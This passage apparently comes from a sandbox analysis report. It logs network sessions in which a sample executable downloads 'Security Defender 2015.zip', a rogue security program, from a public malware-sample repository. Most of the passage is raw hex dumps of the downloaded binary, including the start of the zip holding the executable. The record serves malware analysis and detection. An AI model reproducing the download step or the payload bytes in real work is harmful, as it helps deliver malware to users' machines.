                                                                                                                                                2022-09-29 12:51:53 UTC31834INData Raw: 5a 83 59 dd 2e eb 75 f4 80 d2 ff 4c b7 b5 91 fb 26 36 5c 35 8f 91 99 d1 02 43 0e bc fa 96 1b e9 b5 09 df 21 e5 b4 c0 b9 c1 95 c9 95 6f b3 e7 c3 49 72 5f 0a 29 b9 db 8e bd e3 e0 12 84 c1 c0 eb 6e 21 19 ba 57 5d 24 c7 3c dd 96 67 31 22 94 bc ef 21 ac 6e f6 3f 6a 1e 86 f4 84 41 33 b4 f7 8f 9b 13 4e ec 05 a7 4d 92 bf 5a 07 04 97 97 a4 ad ed 52 12 5d 2e 40 56 d9 ef 07 fc 18 03 04 a5 e0 39 8b 23 de 40 97 5f c8 68 04 2e 77 0b 49 d5 c7 f2 c0 7a f5 e8 7c 0c da c5 a9 9c c0 74 dc be dd 94 1f b1 1a 83 79 a1 99 a9 f2 a8 86 b3 ef 7b c1 0d e5 b0 8e bc 2f 28 59 94 1b 3b 6c 91 57 d1 72 44 b0 28 0c 71 3e 81 52 33 90 3d bf 26 11 df fe c6 2f 29 68 06 18 f9 ff ca e3 6f 2d 86 e6 02 b8 3f 8e 05 90 6f 3b d5 b1 54 ea d1 31 71 96 bb 5e cb 05 e3 be ad bc ca bc 07 3a 15 b7 39 99 0c
                                                                                                                                                Data Ascii: ZY.uL&6\5C!oIr_)n!W]$<g1"!n?jA3NMZR].@V9#@_h.wIz|ty{/(Y;lWrD(q>R3=&/)ho-?o;T1q^:9
                                                                                                                                                2022-09-29 12:51:53 UTC31843INData Raw: e9 30 60 85 01 19 70 1f fe 91 cc 4c ad 9a c8 34 d5 e4 dc 5f 46 89 ca e5 81 e1 2b 6f 7f 2e 9f af 0e f6 75 f1 74 a2 39 b4 98 fc f3 87 18 27 c5 f0 5a 19 c1 42 74 8e 7b 66 7b 06 09 b0 fe 1c 16 fb 25 79 8c 03 49 99 15 ec c0 b3 5e 89 78 f2 5c 0e 6d 81 1b e0 85 33 51 33 25 19 a0 06 d7 85 e5 8e 57 8a 1a 28 6a 3d 1e 87 81 43 89 db a9 5b f3 e3 f2 47 f0 20 07 b7 aa 42 b3 a7 e3 0a 77 88 95 b4 d2 d4 a9 94 c1 22 91 b6 cb a1 ec 0f 22 29 99 93 2a 5e 94 87 e8 c1 6a 8c d4 d8 0f 76 b6 f3 5b e6 56 78 88 d5 0e d0 a0 63 23 6f 00 51 69 ec 0b 9a e9 31 ef 30 2d b7 61 28 82 63 f0 f2 d0 26 5e a4 37 ec da 3e 35 b8 c8 03 f3 e9 70 59 e1 68 33 03 02 a7 0b ef 27 5d ad 1f 9f 04 56 60 4c 98 80 f6 10 1f 25 f9 fd b7 3c 2c 3e a3 91 cf c3 de 9d d2 99 cd 9c 78 ed 48 89 d4 40 23 11 95 34 8e 41
                                                                                                                                                Data Ascii: 0`pL4_F+o.ut9'ZBt{f{%yI^x\m3Q3%W(j=C[G Bw"")*^jv[Vxc#oQi10-a(c&^7>5pYh3']V`L%<,>xH@#4A
                                                                                                                                                2022-09-29 12:51:53 UTC31859INData Raw: 43 98 8c 6c be 80 a4 cb 2f 8e d3 f2 89 c6 41 96 8b a7 12 1c fc fa ff d6 32 ee ab d6 f0 ab 39 40 5d 52 05 55 11 0f fb ca 31 58 f7 83 07 7f 4b 8a 62 b7 d4 0f 9c e0 31 86 e8 18 44 95 42 00 15 ce 8b fc 2c 5f ae 8e 57 fa db ad 34 56 5b f7 2c ce fb 4a e2 5f 45 ea 83 83 ed 7e cd ff 3e 12 6d 66 6e 68 e7 dc d8 93 d7 cf 82 0c 36 32 0a ca 9f c4 62 41 26 68 85 51 f4 9c e3 35 6a c6 5c 21 54 57 77 94 aa ba e1 49 36 95 99 f7 c7 0d fd 58 09 80 c5 32 45 fd 8b 56 c9 64 5d b8 4c a4 ff e7 36 d4 cc 53 a4 d4 25 d9 64 ed a5 98 b8 6a 23 3a 52 57 45 b9 8a 23 3f 43 5b 61 b8 7a da ce fe 52 f2 3a 72 b9 81 77 7a 47 49 20 d3 f1 cf a8 31 0b 14 ab e5 88 c5 e7 2d 03 4d fa 6c 03 55 73 8a 05 7a db a4 7d 04 30 b5 51 99 d6 6a 10 9d c0 70 54 ad de a0 7a 6f 37 d9 18 db 68 cf 02 c7 53 43 d5 02
                                                                                                                                                Data Ascii: Cl/A29@]RU1XKb1DB,_W4V[,J_E~>mfnh62bA&hQ5j\!TWwI6X2EVd]L6S%dj#:RWE#?C[azR:rwzGI 1-MlUsz}0QjpTzo7hSC
                                                                                                                                                2022-09-29 12:51:53 UTC31875INData Raw: 9b 46 9d 26 9f c9 20 b6 bd f0 0f 08 9d ec f3 8c f1 16 1c 18 cb b1 88 77 ce 3e 8d 41 6e dd 92 93 d2 db 9f 86 09 03 b1 cf 43 a2 1c 78 7a c9 0d 65 8a e1 d2 5a 60 25 8d 63 b9 1c 08 76 d5 3e 73 bb 2e d6 36 0b b6 5c 5e d1 bf 15 82 eb 22 ce cb 96 09 fc eb 07 6a 8a 81 f2 3b 48 0c 36 d0 30 cb dc 12 e2 e3 75 fb b3 17 12 62 f5 99 3b e3 03 e5 ad 3b 49 d7 84 4e e8 d0 b4 f9 94 3b 5d 33 ad 32 04 c0 04 05 54 e4 e4 f3 da a9 fa 90 56 e0 cf f3 f1 f8 97 ff ae f4 d4 fa 06 b4 20 6d 3b 6f b1 29 30 33 95 2b 12 5e 9d 32 25 9f 33 3a 53 cc 3c 02 8f 17 eb 2f b1 71 72 e8 26 59 9a d2 99 86 c7 43 ea 1e 37 09 22 35 da 01 7e 05 06 c4 c6 3b 8c bc d5 b6 49 39 39 4f 0e a5 03 4d 28 d7 75 9f 82 dd 19 0f e1 4a 5f 5e ec 92 58 35 40 89 a1 df c7 c8 80 fe 53 fa e6 96 2a 58 2a a5 7a 2c ec 61 e4 12
                                                                                                                                                Data Ascii: F& w>AnCxzeZ`%cv>s.6\^"j;H60ub;;IN;]32TV m;o)03+^2%3:S</qr&YC7"5~;I99OM(uJ_^X5@S*X*z,a
                                                                                                                                                2022-09-29 12:51:53 UTC31891INData Raw: 6d 54 3e 56 ab b0 6a 9d a2 bf 6f 7c a9 8b da ff 52 32 fe a7 ac 5e b7 13 b9 cd 97 57 81 51 25 27 88 b8 04 8a 98 10 06 4f bf 7f 68 09 74 aa 26 71 17 85 9c f9 80 c0 7b 45 df 92 b2 1c 6e 3e 79 8c 7d 65 b7 0d 69 93 9a c2 04 7a c0 46 64 3a fc ff 18 a3 71 65 74 70 1a 62 44 8d d7 5e 11 d3 8a 05 1a 1a 40 92 3d 76 c5 0d e5 15 1e f0 d2 b9 a6 e4 19 4a 18 81 f6 6b c2 6f e1 91 bb ac 00 63 45 4d b9 c3 4d 02 c1 df 1b 15 5d 31 e8 2f 87 28 27 96 e0 07 96 44 c6 a1 d8 68 30 92 17 bf b3 c1 1f 83 64 cd f8 13 eb c4 e4 2d ba 49 c4 7f f9 ef ed e7 4f 4c 1e 66 40 6d fe b5 6d 27 ab c5 f3 16 9d f6 c9 08 93 11 c1 78 ef 24 40 46 b1 f6 59 72 23 dd 6c 62 6b 56 63 99 88 60 ac c5 8b 11 8f e4 8a 0d be cc 1b c0 14 00 a1 10 78 f2 3e d7 39 4c 5e 28 57 92 32 be 6c b3 13 5c e2 60 fa ac d3 95 76
                                                                                                                                                Data Ascii: mT>Vjo|R2^WQ%'Oht&q{En>y}eizFd:qetpbD^@=vJkocEMM]1/('Dh0d-IOLf@mm'x$@FYr#lbkVc`x>9L^(W2l\`v
                                                                                                                                                2022-09-29 12:51:53 UTC31907INData Raw: 18 ff 4d 4d b1 5f 89 57 47 a3 03 62 7f 69 fe e3 ae 8a 83 65 1c 90 46 e6 68 18 86 d1 05 fb de 3c c4 90 e9 67 21 b7 46 31 15 59 43 a0 be cd 14 c6 f3 b3 b2 e7 d4 47 9f d1 56 ae 63 f0 70 4d 1d de 1a 95 14 f9 b3 ff 59 27 33 19 06 cc 4c a6 50 1c df bc fa 0e ea f9 86 23 6f 67 ab 68 78 f2 e5 3e 59 30 47 c2 ea 41 b1 7a 12 e7 71 18 32 9a 2a c8 7b e2 62 0a c6 bd 9f 92 ba 93 13 c2 81 8c e9 29 d8 c9 80 fd f4 0c a9 19 20 3b b9 34 a6 5f ce 53 f4 7a ca 96 9a 72 3c 3f 67 d1 8f 32 2b d1 d5 ad 89 a2 aa 4f 0e 62 81 71 66 2c 1f dc 52 2d a9 37 f7 e1 52 1f f3 3e fa 1e a0 cf 35 9a d1 4c fa 59 b2 75 fe 85 d5 e2 0a 77 3d 92 a5 fb 0b 20 f8 60 2d c9 46 9a 1a 99 bc 39 0f 5c 10 4a 75 aa f5 19 3a 9f 94 54 e7 b4 07 59 e5 47 ce 43 46 bc 0a 9a d4 5d 58 2f b6 67 92 8a ed 45 5f 5a 24 a6 e4
                                                                                                                                                Data Ascii: MM_WGbieFh<g!F1YCGVcpMY'3LP#oghx>Y0GAzq2*{b) ;4_Szr<?g2+Obqf,R-7R>5LYuw= `-F9\Ju:TYGCF]X/gE_Z$


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                58192.168.2.549759140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:54 UTC31913OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:54 UTC31913INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:54 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Defender%202015.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:54 UTC31914INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                59192.168.2.549760185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:54 UTC31915OUTGET /Endermanch/MalwareDatabase/master/rogues/Security%20Defender%202015.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:54 UTC31916INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 470947
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "1119843b6af6d35fb9a350e92c8c020a400ec45ae6f14abd60e6e3e267b6af12"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 0805:8530:1072606:116E222:63359363
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:54 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6968-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455915.558907,VS0,VE173
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: e7aaa5c60a871aa671fab0fbd99856dba42a72eb
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:54 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:54 UTC31916INData Raw: 50 4b 03 04 14 00 01 00 08 00 d8 8d 30 47 ec 96 77 b6 d9 2e 07 00 00 32 13 00 22 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 53 65 63 75 72 69 74 79 44 65 66 65 6e 65 72 32 30 31 35 2e 65 78 65 fc a2 85 cd 48 a8 cb 5b ea 52 b4 a7 55 07 e0 72 50 f2 9a 8f 26 cf dd b3 13 0e d4 da 9e fd d9 33 85 ab dc de ef 39 35 f9 9d a8 56 76 a8 e6 14 24 bb 5a a2 7b c3 1e 12 24 db b0 eb 28 23 7d e7 ae b5 ae 9e 7d 59 25 c6 0e aa 95 06 2a ad c0 dd 82 09 0c 35 62 8a 02 2f 79 fb 8e f8 56 c2 f2 b2 4b 17 5c 4b 2b 94 0d 50 b1 86 40 bf ad 94 cc e9 94 5b 86 01 e3 6b 41 67 a4 f0 10 e6 56 74 76 36 81 f9 09 01 b3 40 1e cd 86 4d fc 63 49 0b e0 b1 b7 27 f6 66 dd 48 4a d2 a5 78 e9 08 76 ca a5 0e 8e 40 43 ec f2 09 1e 88 7a f5 0e 20 0e 5d 9e 50 b9 5e f1 00 46 79 00 14 85 11 04 8f b2 26 51 c4
                                                                                                                                                Data Ascii: PK0Gw.2"Endermanch@SecurityDefener2015.exeH[RUrP&395Vv$Z{$(#}}Y%*5b/yVK\K+P@[kAgVtv6@McI'fHJxv@Cz ]P^Fy&Q
                                                                                                                                                2022-09-29 12:51:54 UTC31918INData Raw: fb f9 a5 08 0f 03 4f 53 16 53 b3 20 14 6b 7f d9 49 d2 8c 02 f2 26 0c 10 19 a8 cb bb 4b c3 5c 4b 9c 6a 7a 19 8c 27 48 4d ec 6f f1 a0 f5 94 55 d2 98 f9 70 68 c7 33 06 3b 60 5a 79 11 55 3d 8b 19 93 b5 88 b1 65 de 45 cd 7f ec 12 22 97 30 c9 1f a3 b2 37 b1 be 27 4d e0 47 3f 9b c9 11 d8 04 88 c7 a4 42 f9 f0 34 66 af dd 5e fb fb fc 01 27 03 71 3d b0 a1 00 a1 7a 05 ea 06 ce 7f 1f c8 89 92 a5 73 24 f3 48 fe 84 6a 52 f7 bc c5 90 fb 7a bb 85 8c 93 5d 3f 11 10 92 a5 d2 27 d4 db 3c d2 9f d3 64 e4 e7 88 82 f9 92 39 9d 48 cd b3 ef ad dd 73 c6 d6 55 16 60 c7 76 b9 b2 06 05 14 eb 19 7c 54 6a 2c ff c2 cd 0f e1 e0 a4 f4 07 66 0f 2d 80 8e b5 db b4 19 fb e8 ce b3 e3 82 c8 d3 8a 5d 76 b0 9d ab 4d b3 2f 59 84 aa 65 4d 60 96 80 57 d0 94 b8 9d 8a a6 81 68 a3 32 af 94 24 92 6e 53
                                                                                                                                                Data Ascii: OSS kI&K\Kjz'HMoUph3;`ZyU=eE"07'MG?B4f^'q=zs$HjRz]?'<d9HsU`v|Tj,f-]vM/YeM`Wh2$nS
                                                                                                                                                2022-09-29 12:51:54 UTC31919INData Raw: 5d 05 7e fe 2e ed 89 7e ca e9 14 6d d3 2d 4f 89 4c 45 45 2a 1a 03 1a bb d8 77 f4 61 f7 38 aa c9 52 74 82 03 c2 76 a1 6b 9a 69 3f 98 bb f9 1e eb 96 fa 29 81 b1 29 16 be df 31 6d 87 08 ef 77 ab 81 20 e0 cd f6 14 b5 93 f7 3f 1e 68 e6 93 e9 62 40 77 7b 72 76 5b 3f 94 3d a8 42 17 7b 85 92 e3 4d c3 05 74 a1 24 26 cc 89 b2 88 a3 4a 95 10 15 47 99 32 a4 63 49 9f 72 5e 47 51 d5 a5 6f 73 d5 ef ef 73 e9 ab 26 55 98 18 76 7d d5 b4 11 58 bb de 0e a5 90 0a 59 ca 21 dd ae f5 39 48 c6 86 fd fd eb b8 14 db ff 5a 9b 23 0e ba 12 f6 ee 0c 8d 28 a5 b3 55 1f 96 ba 27 d3 13 6c 44 63 32 f3 79 5e 8c b8 3c 81 c3 51 8f 5c c9 ba 59 a1 32 ef 38 6f 35 ba 4c d0 62 61 66 40 c6 67 0a f0 f0 84 68 8a 69 af 50 5d f3 65 95 da cd 2e 69 64 d1 87 9b 94 38 ba c4 35 e4 50 2b 57 45 4a d3 db 0d 74
                                                                                                                                                Data Ascii: ]~.~m-OLEE*wa8Rtvki?))1mw ?hb@w{rv[?=B{Mt$&JG2cIr^GQoss&Uv}XY!9HZ#(U'lDc2y^<Q\Y28o5Lbaf@ghiP]e.id85P+WEJt
                                                                                                                                                2022-09-29 12:51:54 UTC31920INData Raw: 98 38 0b 32 ee 84 62 a6 66 07 29 82 28 0f 95 26 5a d8 41 e7 3e ba 68 97 f7 61 8b b4 01 f2 d4 ef 2a 3d 1a 6c ac 0a fe 31 c4 a6 ca 9e ae 11 82 76 5a c4 f1 b2 7e 0f 3a dc a4 28 e5 3f ac 99 e4 03 91 98 ac 9c d4 0f 4d b4 f4 1c 43 87 7d af 24 e4 32 d6 7c 33 f3 6d 4c c1 e9 2c 8d 77 ca 7c c7 06 c5 59 69 c3 67 8c df 24 b9 42 8c 4e 76 82 fb 2f c0 43 92 de 39 d4 65 7a 8b 99 29 a6 30 2c cc a1 da 30 0c c8 7e 08 b0 6d ca 0d 44 52 32 44 d0 2d 82 9f a3 75 c6 f3 09 4f 57 82 9c 25 6a b0 50 0f 8a 45 ae 1e 93 ba f7 bb 63 dd f8 15 ee 32 87 0c e6 aa 56 96 66 87 1f 28 00 4d ac ae 96 37 48 67 ae 38 4b 63 1c c0 ce c8 2c db 9c 4e ff 11 b8 0f 1d 69 40 76 a5 83 e5 0f 9b 8e c7 02 aa c2 a6 47 83 4e cf a4 f8 c9 0f bd 85 73 38 46 db dd 22 f9 33 ed 54 29 21 a6 c6 e6 20 50 b9 1d 0c 7a 18
                                                                                                                                                Data Ascii: 82bf)(&ZA>ha*=l1vZ~:(?MC}$2|3mL,w|Yig$BNv/C9ez)0,0~mDR2D-uOW%jPEc2Vf(M7Hg8Kc,Ni@vGNs8F"3T)! Pz
                                                                                                                                                2022-09-29 12:51:54 UTC31922INData Raw: a1 46 c3 17 dd 55 1a 9e 55 6c a2 e6 13 79 c6 7f 46 12 70 b4 96 25 1e f8 52 3e c9 3a 09 88 33 2c 12 fd cd 65 95 01 f6 88 64 11 71 79 b8 dd d8 52 8a a2 8f 65 e6 eb 68 e0 38 df 5f 45 e6 a2 dc f1 b7 9f bc 93 38 3a 79 8e d9 88 0d bf d3 a8 7a 1c 61 ab 75 a7 64 51 e5 c5 5d 7e 6c 93 1f 1b 5e 50 55 84 3f 5b d3 7c 6f 75 46 11 a1 15 ba f2 54 f0 3c 5b 4f 4e 56 59 52 00 61 5d 5c 8e 97 e4 71 31 b6 bb f8 7c b6 f6 aa d9 40 37 56 d6 42 e4 38 47 7a 4d 5a 37 c8 d2 d3 8a 22 c1 97 ff b7 b2 8c db ba 6f 10 68 c9 ea 98 e3 bb 2e ed 9d f6 eb f0 75 a1 66 5c 51 6e 80 f7 9d 1a e9 b9 dd e2 06 77 62 f5 5a ba c9 ad a2 44 8d 95 65 26 91 35 ca 69 d6 e6 c5 64 08 c7 c2 c0 d8 73 56 79 81 2b b6 74 a4 d6 6e ad 04 2a 09 69 74 86 63 4c 83 86 d7 90 60 28 3f 65 36 67 3b 24 5d 80 8b 7e 27 cf 99 fa
                                                                                                                                                Data Ascii: FUUlyFp%R>:3,edqyReh8_E8:yzaudQ]~l^PU?[|ouFT<[ONVYRa]\q1|@7VB8GzMZ7"oh.uf\QnwbZDe&5idsVy+tn*itcL`(?e6g;$]~'
                                                                                                                                                2022-09-29 12:51:54 UTC31923INData Raw: 4e cf 25 e4 37 49 1a 39 30 2f 7a a6 0e d9 7f 1e 71 3e 6d 27 25 2f de 83 7e 0c 85 b5 83 d9 38 cb 3f 35 b7 cb ac 0a 37 3f 40 7d 92 d8 33 25 0e 0c 4f 9c d7 8e 09 03 3c 28 16 9d 08 0e 1b 2d e7 7e 23 6b 9e 59 88 d4 1c 09 0c 62 85 57 d5 b8 c2 04 05 8e 1e dc dc 52 44 ba b1 b3 2e 81 e3 4e 56 3a a4 4c ce 65 75 dc 8f ee 7a 00 84 ea 52 01 5b 19 01 00 92 dd 48 89 ea 75 25 8b a1 5a 14 86 a2 7c a5 f5 e0 bb 20 83 96 d1 73 f2 f9 fe 31 e0 0d ca ea 8c 8a a6 14 1d 8d ce d8 a1 65 a9 e6 f6 9f f9 01 d3 2e 8f 58 87 c7 d8 f6 c9 e2 be 05 80 01 10 71 73 e6 49 09 af f8 d0 4d 25 17 20 13 81 f6 71 84 c3 d4 dd c6 10 df 31 78 f0 08 d7 d2 a5 8e 2b 11 dd b4 15 bd f7 d9 78 00 23 df d8 ba eb 1a 41 c5 26 f8 5f 53 72 6e 13 de 74 1f 1d b4 33 b9 fd 41 89 d5 44 f3 97 f6 09 6b a4 f4 41 00 a7 58
                                                                                                                                                Data Ascii: N%7I90/zq>m'%/~8?57?@}3%O<(-~#kYbWRD.NV:LeuzR[Hu%Z| s1e.XqsIM% q1x+x#A&_Srnt3ADkAX
                                                                                                                                                2022-09-29 12:51:54 UTC31924INData Raw: 48 e9 2f 9f f2 10 99 28 b7 dc 19 09 f5 e1 b9 d1 39 36 40 d9 34 b1 ed b9 f8 84 c8 2a 43 a5 bd dd 76 4b f1 52 cd 75 f7 5e da 66 e8 f3 b1 fe 9b 8a f2 b5 42 93 e8 d7 ab 61 67 57 ff 6c 4b 4e f2 b9 5c 72 f5 ef 3c 46 15 4f a5 5e fd ad 57 61 b6 f5 ec e9 e4 50 5b 13 c2 79 27 74 34 9e d3 94 d7 8d 65 94 0f 61 6b 6f c2 eb af 50 bd 5c 18 12 a5 31 a8 6f ad a6 fc 8e 2e 7f 52 23 cb 1e 1a 2a 75 08 a6 cc f4 d0 1b d4 6a 74 e4 0f 0f 81 e1 c1 cf ef 53 08 0e b9 af cb da 61 2f 06 97 c1 cb f9 b7 7c d4 63 a1 76 97 ca c7 6e 2c b7 fa 57 5a 15 2e 2d 08 b4 3b ce 4b 4f 30 31 24 74 31 ac ef c0 4b 03 11 7d f1 16 be 92 e3 7b 01 ad 09 3c 07 95 11 77 87 53 0e e1 3c 61 be 15 27 d3 dc c8 62 79 ea 97 35 37 45 e7 f4 b8 db 71 6f 06 3c 58 bd 8a b3 a1 9a 3a a8 c5 c0 0b 1c a3 d4 6b 74 89 7b f0 32
                                                                                                                                                Data Ascii: H/(96@4*CvKRu^fBagWlKN\r<FO^WaP[y't4eakoP\1o.R#*ujtSa/|cvn,WZ.-;KO01$t1K}{<wS<a'by57Eqo<X:kt{2
                                                                                                                                                2022-09-29 12:51:54 UTC31926INData Raw: a3 b2 53 fd 6a 45 2e 1b 47 43 88 45 1e 0c e6 a9 4b e4 ac 8d 40 b2 39 61 f2 79 09 f4 e9 7f 8d c5 6f 9b 91 5e d3 b1 ff 20 08 a5 a7 18 92 b6 9d 21 2c 00 61 eb 20 21 5e 19 35 51 f7 b7 7b cf 2e 8f 84 e6 46 56 97 57 b3 b6 32 dd f6 01 88 65 6e a4 8d 93 46 58 2d 45 39 90 62 c9 b0 71 47 e0 27 72 8a 08 9a de 32 42 f8 93 01 71 c6 f0 e3 43 34 dc b2 e3 c7 1f 21 1c c5 9c dc 79 66 e6 4e 65 e9 88 1f bb a1 e6 00 f8 66 38 ac 81 6c e2 24 30 09 09 8b a4 29 4d 02 98 c6 41 ef ba 82 e4 2b d6 7e f0 18 3b 29 26 c9 19 a6 93 b9 63 2a 25 a0 ff 06 8e 83 91 81 3d 34 6f 4e 77 6d a9 ff 8c 63 db e3 16 e9 c4 c7 0b 28 d6 8a 23 c3 e8 71 47 03 14 3a 23 8e fe 0d 6c fc 40 e8 8b 5f 66 6b 1f e1 c0 d0 4b d4 a5 a3 5b 0e 2e 0d 77 67 ea 51 69 c0 0a a5 6c 67 89 ce 69 19 72 83 0f b4 46 96 5e 48 5f aa
                                                                                                                                                Data Ascii: SjE.GCEK@9ayo^ !,a !^5Q{.FVW2enFX-E9bqG'r2BqC4!yfNef8l$0)MA+~;)&c*%=4oNwmc(#qG:#l@_fkK[.wgQilgirF^H_
                                                                                                                                                2022-09-29 12:51:54 UTC31927INData Raw: 79 ca 61 b8 b6 87 3d 32 3b 4d df 4f 09 4d ce 83 04 1a 0d 19 bc 29 a6 7c 61 84 d5 73 70 99 be 93 59 3a c8 99 97 9c cb a3 e5 5a dd e7 3c cf 43 5d d3 46 ee 27 ac e2 89 02 ff 03 00 cf 3f 81 40 50 50 a0 86 d6 8b ce de ec d9 a7 41 45 11 02 a2 d7 70 f7 e5 e4 29 dd 21 6f f2 ae 6e b3 84 78 7c a3 da eb 99 80 81 60 a0 23 8f b9 4f 85 36 82 a5 fb fc 1e da e3 41 ed 96 f7 89 84 1c b4 7b 5e 6b 25 86 0d 37 91 41 47 ae 8d e6 aa d7 c8 f3 5f 06 b1 63 0e 9b d1 d3 f6 99 4b 73 b8 00 79 0b d3 9f 44 ed eb 11 2b e7 b5 69 07 56 eb 65 03 33 0e 3d 3c c7 c4 02 86 34 11 67 f1 0f ba db 20 e2 94 fd e6 e9 d2 ae 4a 11 22 8b f9 aa 9d 45 8c 42 a1 6d 85 9a 92 10 91 22 34 6b 74 34 53 be ce c2 94 2e e0 b4 0e 95 a0 8b 1c b2 e8 91 52 a2 1f 42 12 61 e6 7c 67 45 6f 2d 92 72 1d 62 01 04 4c 98 51 ce
                                                                                                                                                Data Ascii: ya=2;MOM)|aspY:Z<C]F'?@PPAEp)!onx|`#O6A{^k%7AG_cKsyD+iVe3=<4g J"EBm"4kt4S.RBa|gEo-rbLQ
                                                                                                                                                2022-09-29 12:51:54 UTC31928INData Raw: a9 5f a0 d3 6b 81 83 a4 b3 72 1e 69 c8 23 52 2b c9 25 84 7e 9a 3e af 3a 12 42 d9 cf 38 4c 68 c6 4e c3 95 de 65 1c 1b 40 1d 82 d0 69 f5 3e 34 72 52 4f 29 fa b6 65 8e a5 ea 8f b2 a5 0b 9e 14 ff 99 4c ca 04 7f bd 0f 24 b6 8a 37 13 e7 38 c3 c7 29 73 9d 26 6e 9e 1b d8 a3 53 01 9f 56 27 df 4f 01 b3 dd 77 dc f9 8c c0 7c f9 12 96 3c 44 f5 24 34 a4 46 e0 ef 64 b3 11 5a e0 5e 37 d0 82 3c 50 fe c9 a6 03 8d ca 31 1e c0 91 1a 4f 88 1c 05 11 b0 23 24 10 72 ca 06 89 03 12 7b 55 4d 1a 8b 50 8e be d1 c0 7d 0b 48 f7 7d ca c3 81 be 76 5d 2d 44 c1 95 d4 43 67 7b 70 ed 47 e0 fd 1d 99 82 5f 41 72 3c 95 85 bb 0c aa 75 04 7b f4 b7 bd 3b 96 4c 48 c6 f9 87 6b eb 70 e0 01 90 86 5e a4 86 14 01 0c d0 28 83 4b 69 bd a3 5c e7 82 56 d2 cf c2 aa fe ad 68 b4 22 70 03 2a 99 df 4c 93 ec 5c
                                                                                                                                                Data Ascii: _kri#R+%~>:B8LhNe@i>4rRO)eL$78)s&nSV'Ow|<D$4FdZ^7<P1O#$r{UMP}H}v]-DCg{pG_Ar<u{;LHkp^(Ki\Vh"p*L\
